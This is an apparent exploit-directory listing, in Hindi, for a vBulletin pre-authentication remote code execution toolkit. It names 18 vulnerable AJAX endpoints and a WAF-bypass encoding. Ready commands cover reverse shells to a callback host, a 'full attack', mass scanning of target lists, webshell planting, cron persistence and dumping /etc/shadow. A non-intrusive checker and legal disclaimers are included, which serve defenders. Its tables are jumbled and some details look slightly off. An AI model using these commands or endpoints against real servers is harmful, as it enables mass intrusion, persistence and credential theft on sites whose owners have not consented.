Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin प्री-ऑथ RCE (CVSS 9.8)। Vuln 5.x/6.x (अनपैच्ड)। एंडपॉइंट पूल, AJAX, PHPFuck WAF बाईपास के माध्यम से मल्टी-एक्सप्लॉइट। पूर्ण टूलकिट: रिवर्स शेल, प्रॉक्सी, पर्सिस्टेंस, वेबशेल, डेटाबेस ऑपरेशन, फ़ायरवॉल नियंत्रण, लॉग प्रबंधन, मास स्कैनिंग। 2 संस्करण: मल्टी-एक्सप्लॉइट और सेफ-चेक। Python 3.8+ नैतिक रूप से उपयोग करें, कानूनी रहें। 🔒 | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
नेटवर्क मैपिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

डेटाबेस सुरक्षा
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

रिपॉजिटरी देखें
4101 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-61511 – vBulletin प्री-ऑथ RCE (CVSS 9.8)। Vuln 5.x/6.x (अनपैच्ड)। एंडपॉइंट पूल, AJAX, PHPFuck WAF बाईपास के माध्यम से मल्टी-एक्सप्लॉइट। पूर्ण टूलकिट: रिवर्स शेल, प्रॉक्सी, पर्सिस्टेंस, वेबशेल, डेटाबेस ऑपरेशन, फ़ायरवॉल नियंत्रण, लॉग प्रबंधन, मास स्कैनिंग। 2 संस्करण: मल्टी-एक्सप्लॉइट और सेफ-चेक। Python 3.8+ नैतिक रूप से उपयोग करें, कानूनी रहें। 🔒

साझा करें

CVEPoC

CVE-2026-61511 – vBulletin प्री-ऑथ RCE एक्सप्लॉइट और वेरिफायर

Python 3.8+ CVSS Author vBulletin

⚠️ केवल नैतिक उपयोग – अधिकृत सुरक्षा परीक्षण
यह रिपॉजिटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनिट्रेशन टेस्टर्स के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच CFAA (अमेरिका), कंप्यूटर मिसयूज़ एक्ट (यूके), TCK 243/244 (तुर्की) और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑61511 vBulletin के AJAX टेम्पलेट रेंडरिंग इंजन में एक PHP eval() इंजेक्शन दोष है।
प्रभावित संस्करण: 5.0.0 – 5.7.5 और 6.0.0 – 6.2.1।

यह कैसे काम करता है

  1. कई अटैक एंडपॉइंट – यह बग कई AJAX हैंडलर्स में मौजूद है:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • विभिन्न /ajax/api/content_* /getIndexableContent एंडपॉइंट
  2. PHPFuck एन्कोडिंग – पेलोड को PHP ऑपरेटरों और संख्याओं के अनुक्रम में बदल दिया जाता है जो WAF फिल्टर को बायपास करता है और मनमाना PHP कोड निष्पादन की अनुमति देता है।

  3. कोई प्रमाणीकरण आवश्यक नहीं – एक हमलावर किसी भी कमजोर एंडपॉइंट पर एक क्राफ्टेड POST अनुरोध भेज सकता है और वेब सर्वर के विशेषाधिकारों के साथ सिस्टम कमांड निष्पादित कर सकता है।

  4. प्रभाव – पूर्ण सर्वर समझौता, डेटा चोरी, बैकडोर, लेटरल मूवमेंट और पर्सिस्टेंस। संस्करण अपग्रेड करें!

पैच

  • vBulletin 6.2.2 और पुराने संस्करणों के लिए पैच लेवल 1 इस समस्या को ठीक करते हैं।
  • हमेशा नवीनतम संस्करण में अपग्रेड करें।

🧰 उपकरण

उपकरणउद्देश्यलक्षित उपयोगकर्ता
exploit.pyरिवर्स शेल, पर्सिस्टेंस, फ़ाइल ऑपरेशन, डेटाबेस डंप, फ़ायरवॉल प्रबंधन, लॉग प्रबंधन, पोर्ट फ़ॉरवर्डिंग, SSH कुंजी तैनाती, नेटवर्क स्कैनिंग और मास स्कैनिंग (मल्टी‑थ्रेडेड) के साथ पूर्ण टूलकिट।

📊 फीचर तुलना


🎯 उपयोग केस सारांश


⚙️ इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

requirements.txt सामग्री:

root@kitploit:~
request
urllib3

पैरामीटर 🌬️

परिदृश्य

एंडपॉइंट पूल 🅿️

🛡️ जिम्मेदार उपयोग

  • इन उपकरणों का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुंच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
रेड टीम / अधिकृत पेंटेस्टर्स
safecheck.pyगैर‑आक्रामक वेरिफायर जो बिना किसी दुर्भावनापूर्ण पेलोड निष्पादित किए भेद्यता की जांच करता है। संस्करण का पता लगाता है, सभी एंडपॉइंट का परीक्षण करता है और विस्तृत रिपोर्ट उत्पन्न करता है।ब्लू टीम / सुरक्षा ऑडिटर
फीचरexploit.pysafecheck.py
भेद्यता का पता लगाना✅✅
संस्करण का पता लगाना✅✅
मल्टी‑एंडपॉइंट परीक्षण (18 पथ)✅✅
कमांड निष्पादन✅❌
रिवर्स शेल✅❌
फ़ाइल अपलोड/डाउनलोड✅❌
पर्सिस्टेंस तंत्र✅❌
वेब शेल तैनाती✅❌
डेटाबेस ऑपरेशन✅❌
सिस्टम जानकारी संग्रह✅✅
फ़ायरवॉल प्रबंधन✅❌
लॉग प्रबंधन✅❌
पोर्ट फ़ॉरवर्डिंग✅❌
SSH कुंजी तैनाती✅❌
नेटवर्क स्कैनिंग✅❌
मास स्कैनिंग (मल्टी‑थ्रेड)✅❌
प्रॉक्सी समर्थन✅✅
JSON रिपोर्ट आउटपुट✅✅
इंटरैक्टिव मेनू✅❌
गैर‑आक्रामक (सुरक्षित) मोड❌✅
वर्बोज़/डीबग मोड✅✅
कस्टम कमांड निष्पादन✅❌
मल्टी‑कमांड चेनिंग✅❌
रिमोट फ़ाइल पढ़ना✅❌
रिमोट फ़ाइल लिखना✅❌
सिस्टम उपयोगकर्ता प्रबंधन✅❌
फ़ायरवॉल बायपास तकनीक✅❌
WAF चोरी (PHPFuck)✅✅
परिदृश्यअनुशंसित उपकरण
ब्लू टीम – जांचना कि आपका vBulletin इंस्टॉलेशन कमजोर है या नहींsafecheck.py
सुरक्षा ऑडिट – गैर‑आक्रामक भेद्यता मूल्यांकनsafecheck.py
रेड टीम – पूर्ण एक्सप्लॉइटेशन के साथ अधिकृत पेनिट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणsafecheck.py
मास स्कैनिंग – कई लक्ष्यों की भेद्यता की जांचexploit.py (केवल पहचान)
घटना प्रतिक्रिया – जांचना कि सिस्टम समझौता हुए हैं या नहींsafecheck.py
पैरामीटरविवरण
-t, --targetलक्ष्य URL (जैसे http://forum.com/vb)
--proxyHTTP प्रॉक्सी (जैसे http://127.0.0.1:8080)
--timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
--retryप्रति पथ पुनः प्रयास संख्या (डिफ़ॉल्ट: 3)
--outputविस्तृत रिपोर्ट को JSON फ़ाइल में सहेजें
-v, --verboseवर्बोज़ आउटपुट
-q, --quietशांत मोड (न्यूनतम आउटपुट)
--lhostएक्सप्लॉइट के लिए आवश्यक – कॉलबैक के लिए IP
--lportकॉलबैक के लिए पोर्ट (डिफ़ॉल्ट: 4444)
--threadsमास स्कैनिंग के लिए थ्रेड (डिफ़ॉल्ट: 5)
--exploitपहचान के बाद एक्सप्लॉइटेशन करें
--fullपूर्ण हमला (सभी मॉड्यूल)
--shellरिवर्स शेल शुरू करें
--webshellवेबशेल इंस्टॉल करें (/shell.php)
--persistपर्सिस्टेंस इंस्टॉल करें (क्रॉन जॉब)
--dumpडेटाबेस डंप करें
--dump-credsक्रेडेंशियल डंप करें (/etc/passwd, /etc/shadow)
--interactiveसफल सत्यापन के बाद इंटरैक्टिव मेनू
#परिदृश्यकमांड
1त्वरित भेद्यता जांचpython safecheck.py -t http://target.com/vb
2रिपोर्ट के साथ विस्तृत स्कैनpython safecheck.py -t http://target.com/vb --output report.json -v
3रिवर्स शेलpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4पूर्ण हमला (सभी मॉड्यूल)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5फ़ाइल से मास स्कैनिंगpython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6इंटरैक्टिव मेनू मोडpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#एंडपॉइंट
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent